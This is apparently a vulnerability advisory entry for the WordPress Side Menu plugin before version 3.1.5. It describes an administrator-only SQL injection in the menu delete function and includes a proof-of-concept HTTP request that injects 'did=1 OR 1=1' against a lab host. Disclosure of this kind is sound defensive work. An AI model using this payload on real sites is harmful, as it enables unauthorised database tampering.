WordPress Plugin Vulnerabilities
Side Menu < 3.1.5 - Authenticated (admin+) SQL Injection
Description
The menu delete functionality of the plugin, available to Administrator users takes the did GET parameter and uses it into an SQL statement without proper sanitisation, validation or escaping, therefore leading to a SQL Injection issue
Proof of Concept
GET /wp-admin/admin.php?page=side-menu&info=del&did=1%20OR%201=1 HTTP/1.1 Host: 172.28.128.50 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.28.128.50/wp-admin/admin.php?page=side-menu&info=saved Accept-Language: en-US,en;q=0.9 Cookie: [admin+] Connection: close
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-27 (about 2 years ago)
Added
2021-05-27 (about 2 years ago)
Last Updated
2021-05-29 (about 2 years ago)